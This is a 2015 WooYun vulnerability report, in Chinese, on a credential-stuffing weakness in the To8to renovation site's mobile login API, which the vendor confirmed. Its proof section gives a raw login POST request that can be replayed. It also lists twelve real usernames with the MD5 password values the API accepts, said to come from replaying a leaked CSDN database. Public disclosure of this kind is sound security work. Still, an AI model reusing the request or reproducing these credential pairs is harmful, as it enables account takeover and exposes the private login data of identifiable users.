当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108175

漏洞标题:土巴兔装修网某接口撞库泄露用户登录凭据(有账号证明)

相关厂商:土巴兔装修网

漏洞作者: 路人甲

提交时间:2015-04-15 18:55

修复时间:2015-05-31 08:38

公开时间:2015-05-31 08:38

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-15: 细节已通知厂商并且等待厂商处理中
2015-04-16: 厂商已经确认,细节仅向厂商公开
2015-04-26: 细节向核心白帽子及相关领域专家公开
2015-05-06: 细节向普通白帽子公开
2015-05-16: 细节向实习白帽子公开
2015-05-31: 细节向公众公开

简要描述:

某接口撞库泄露用户登录凭据(有账号证明)

详细说明:

手机登录接口没有防御撞库。对登录接口的调用没有进行限制。经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号

漏洞证明:

经过测试发现,使用某泄露数据库可以碰撞获得大量有效的登录账号

POST http://mobileapi.to8to.com/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; HUAWEI C199 Build/HuaweiC199; TO8TOAPP)
Host: mobileapi.to8to.com
Connection: close
Accept-Encoding: gzip
Content-Length: 168
username=fanzhenkun&model=user&action=owner&appversion=2.5.0&systemversion=19&password=dac80695ee5f7a6c915a84916f16d2f0&channel=%E8%B1%8C%E8%B1%86%E8%8D%9A&version=2.5&


695 672 是成功登录的用户。用csdn库 ,跑10分钟,成功97个账号。

rigxin	4692b5920e6a81b19e39ee9d5accb0e3
tudiearth	9250db41bd1a5c846d3be8b665aac1b5
wly1zwss	347d2b5dd6c78f37e913c9163e120c09
luojiayun	0bed82c83b09406ff977f752541f9e96
Martin0602	823b07f31072d2332bd4137ba51c261f
yxb223	7da3130fb47e9b3bdc89459d27674476
starfxx	1235b644b573e87fbeeba702646f65ba
WhiteWizard	7543719c1a48b331872e9fb654bac443
oldevil	2a6e4aed26d1cb8da6ee17f0d9bca6a2
gmcc17951	41de8c798fbeac9668234ecc1ccd70d1
mikepat666	bfd9f0cc586164634e1b9a255069ca5f
zas135421	158c4b89f7001e03c4d217332ca9d5a7


屏幕快照 2015-04-15 下午6.15.55.png


屏幕快照 2015-04-15 下午6.20.46.png

修复方案:

撞库防御参考资料:http://stayliv3.github.io/2015/04/15/%E6%92%9E%E5%BA%93%E6%94%BB%E5%87%BB%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88/

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-16 08:37

厂商回复:

感谢你的反馈,处理中

最新状态:

暂无